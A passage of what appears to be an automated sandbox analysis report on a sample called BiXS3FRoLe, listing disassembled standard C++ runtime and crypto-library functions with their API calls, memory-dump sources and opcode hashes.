                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 67c0a6790415184ce4936c24cfabdfbabb6c90119d3496c291b38214754844f2
                                                                                                        • Instruction ID: 3af01f4be218d66b5b7455399f29f4635a4a5063155f45225f117c4043619377
                                                                                                        • Opcode Fuzzy Hash: 67c0a6790415184ce4936c24cfabdfbabb6c90119d3496c291b38214754844f2
                                                                                                        • Instruction Fuzzy Hash: 0B1151329001189BCF05FBA4DD52BFDB7B5AF94710F244449F5156B291DF789E01CB90
                                                                                                        Function 00AF8741 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF8748
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8752
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF87A3
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF87C3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF87E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: d431552fbf52da9efc581f92f1058a0b746ba0c17ce5c7b3ff2f4d42ef13c615
                                                                                                        • Instruction ID: aa707fb1cfe2b78ce8399c319379a1f139189a4f28adcda1f8488b1eeb62905e
                                                                                                        • Opcode Fuzzy Hash: d431552fbf52da9efc581f92f1058a0b746ba0c17ce5c7b3ff2f4d42ef13c615
                                                                                                        • Instruction Fuzzy Hash: 2B119A329002189BCF05FBA4DD52BFE77B5AF94720F284449F501AB2A1CF78AE00CB90
                                                                                                        Function 00AF89D9 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF89E0
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF89EA
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8A3B
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8A5B
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8A79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 3aa510dbfcd2790c512def8d5df5c68c4d35be209b10b3c1b25fd8a963a9c121
                                                                                                        • Instruction ID: ff21128824e677d90824452f1951f67fee0daf6d456156a71e77f197d0555bea
                                                                                                        • Opcode Fuzzy Hash: 3aa510dbfcd2790c512def8d5df5c68c4d35be209b10b3c1b25fd8a963a9c121
                                                                                                        • Instruction Fuzzy Hash: 06119E329002189BCF05FBA4CD51AFE77B5EF94710F25448AF5116B2A1CF789E40CB90
                                                                                                        Function 00AF8933 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF893A
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8944
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8995
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF89B5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF89D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 848f60fd161fe8de713b130b271d76cee1bfa21b4d863b9522d55ff5663c2bd2
                                                                                                        • Instruction ID: 121f7d995f227107bcaba4d42d63ab7c7c4801b74bc0b8e2f1f83d7ebd494810
                                                                                                        • Opcode Fuzzy Hash: 848f60fd161fe8de713b130b271d76cee1bfa21b4d863b9522d55ff5663c2bd2
                                                                                                        • Instruction Fuzzy Hash: D91170329002199BCF05EBE4CD52AFD77B5EF94710F244849F5156B2A1CF789E01CB91
                                                                                                        Function 00AE5698 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AE569F
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE56A9
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE56FA
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE571A
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE5738
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 7edbd1ec116f3c51fb54f58f0e637faaa0ea6dccdc64c2d66a7b6160adeb4915
                                                                                                        • Instruction ID: 8a3580e5b84817bd4f4be0b31291715cdcded765741183fa81db7011b9e2c21f
                                                                                                        • Opcode Fuzzy Hash: 7edbd1ec116f3c51fb54f58f0e637faaa0ea6dccdc64c2d66a7b6160adeb4915
                                                                                                        • Instruction Fuzzy Hash: 91110272D006589BCF05EBB8DE41AFD77B4AF94714F144849E400AB2E1CF349E05CB90
                                                                                                        Function 00AE573E Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AE5745
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE574F
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE57A0
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE57C0
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE57DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 4d95bb5ac22687d3cd451061b09cefa9bfdde2982290234bbc0f04e40f49df24
                                                                                                        • Instruction ID: 6fa94392cb9361d45145faec9fbb20118c59edf057d5e53d28501b8648b6fb3c
                                                                                                        • Opcode Fuzzy Hash: 4d95bb5ac22687d3cd451061b09cefa9bfdde2982290234bbc0f04e40f49df24
                                                                                                        • Instruction Fuzzy Hash: 5611C232D00694DBCF05EBB8DD45BEE77B5AF94724F144849E415AB2E1DF749A00CB90
                                                                                                        Function 00B343FE Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00B259B8,00B35BD7,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?), ref: 00B34403
                                                                                                        • _free.LIBCMT ref: 00B34438
                                                                                                        • _free.LIBCMT ref: 00B3445F
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?), ref: 00B3446C
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?), ref: 00B34475
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: 30b261442eb9cb7922d6eb8667d3d92a599ee80e68ec3db73f05db4f71bbda43
                                                                                                        • Instruction ID: 31de7777a9f5d7733f095a55015bc7c9f753116c345f06973bf610bcc773ff68
                                                                                                        • Opcode Fuzzy Hash: 30b261442eb9cb7922d6eb8667d3d92a599ee80e68ec3db73f05db4f71bbda43
                                                                                                        • Instruction Fuzzy Hash: A701F43A20070067821267797C85F2B3AEADBC1BB6F3441F9F515933A2FF24AE058121
                                                                                                        Function 00B3D345 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B3D35D
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B3D36F
                                                                                                        • _free.LIBCMT ref: 00B3D381
                                                                                                        • _free.LIBCMT ref: 00B3D393
                                                                                                        • _free.LIBCMT ref: 00B3D3A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 7ae35b89d8bb1424ff0aa70826700627fe1c9caa147be819384c67f40700ab89
                                                                                                        • Instruction ID: 273abc4a8b7f86220309ec346fd5d0c0a20a3c4219f836649cd72a970d0bea45
                                                                                                        • Opcode Fuzzy Hash: 7ae35b89d8bb1424ff0aa70826700627fe1c9caa147be819384c67f40700ab89
                                                                                                        • Instruction Fuzzy Hash: 06F0D6725147117B8734EB64F4C5C2A73E9EB45B50FB40895F045D7661CB34FD808769
                                                                                                        Function 00AE9359 Relevance: 7.5, APIs: 5, Instructions: 39timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00B0249C
                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00B024BC
                                                                                                          • Part of subcall function 00B01D2D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B01D4F
                                                                                                          • Part of subcall function 00B01D2D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00B01D70
                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00B024CF
                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00B024DB
                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00B024E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                        • String ID:
                                                                                                        • API String ID: 1236927926-0
                                                                                                        • Opcode ID: 8863e50ab0341dd84d67681ce1d2ce7963d46c9f48f78b945e469889fc5a281d
                                                                                                        • Instruction ID: 982af9f5720eefc573a3494b84adc19448e85fda83b10827415437db07b8b820
                                                                                                        • Opcode Fuzzy Hash: 8863e50ab0341dd84d67681ce1d2ce7963d46c9f48f78b945e469889fc5a281d
                                                                                                        • Instruction Fuzzy Hash: E7F02430600304A7CF187BBC088A6AD3EDA5F95350B5881E8FA126F3C1DE708D0892A0
                                                                                                        Function 00B30292 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B302B0
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B302C2
                                                                                                        • _free.LIBCMT ref: 00B302D5
                                                                                                        • _free.LIBCMT ref: 00B302E6
                                                                                                        • _free.LIBCMT ref: 00B302F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 31a9a72107b8c9a38953d0d8390965099a5ab202f6e413de3ea67c60200d8a4d
                                                                                                        • Instruction ID: 3bad8f0db4e7d0420943e1140c5c31e6266f4c118e3c87839fd04d6485110238
                                                                                                        • Opcode Fuzzy Hash: 31a9a72107b8c9a38953d0d8390965099a5ab202f6e413de3ea67c60200d8a4d
                                                                                                        • Instruction Fuzzy Hash: E5F03A75804221ABDB61AF28FD224553BE0FB0676076041AFF424532B1CF391E01CBC8
                                                                                                        Function 00AD0CD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0D8E
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0DF9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name
                                                                                                        • String ID: ThisPointer:$ValueNames
                                                                                                        • API String ID: 1734802720-2375088429
                                                                                                        • Opcode ID: 1d4892fe9ac9f6e190567795b191ca4e29dd4cf12642f1b44028d1e73501f0ee
                                                                                                        • Instruction ID: 174a4c1b5adec9d3256555bd1f77c81ceed7ce4fcf462628585ac1a735a42153
                                                                                                        • Opcode Fuzzy Hash: 1d4892fe9ac9f6e190567795b191ca4e29dd4cf12642f1b44028d1e73501f0ee
                                                                                                        • Instruction Fuzzy Hash: 8551D3312043405FCB209F748C91F67BBE6AF59744F448CAEE5CA87352DB62E908C761
                                                                                                        Function 00AD0AE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0B9E
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0C09
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name
                                                                                                        • String ID: ThisPointer:$ValueNames
                                                                                                        • API String ID: 1734802720-2375088429
                                                                                                        • Opcode ID: 3a0d46bcc6e9ad5c6d9b4922d43b3010e70ecece929714465aa0c15ef7208e4a
                                                                                                        • Instruction ID: ec9642644c6316ff822f263359191dfe96409d570e9c02614b8fe08a3eef2eeb
                                                                                                        • Opcode Fuzzy Hash: 3a0d46bcc6e9ad5c6d9b4922d43b3010e70ecece929714465aa0c15ef7208e4a
                                                                                                        • Instruction Fuzzy Hash: F251E1313183409FCB209F248D91F67BBE5AF55708F4489AEE9CA87352DB62E908C761
                                                                                                        Function 00ABD680 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD72F
                                                                                                        Strings
                                                                                                        • TruncatedDigestSize, xrefs: 00ABD779
                                                                                                        • PutMessage, xrefs: 00ABD756
                                                                                                        • FilterWithBufferedInput: invalid buffer size, xrefs: 00ABD706
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
                                                                                                        • API String ID: 2005118841-3547780871
                                                                                                        • Opcode ID: 78d7a0fd6cb82ae95c2c6be57eb5d62bc6fcada4a3a5c0b287bd70c68b6f03ac
                                                                                                        • Instruction ID: 48d72518958ad07fd18ae686c8cc4543266c762ebd5ef5d49fa830c192bb5642
                                                                                                        • Opcode Fuzzy Hash: 78d7a0fd6cb82ae95c2c6be57eb5d62bc6fcada4a3a5c0b287bd70c68b6f03ac
                                                                                                        • Instruction Fuzzy Hash: 3031E471600205AFCB14DF54CC95EEAB7F8FF58720F0046AAF41597691DB70E909CB90
                                                                                                        Function 00A75E30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A75EAB
                                                                                                        Strings
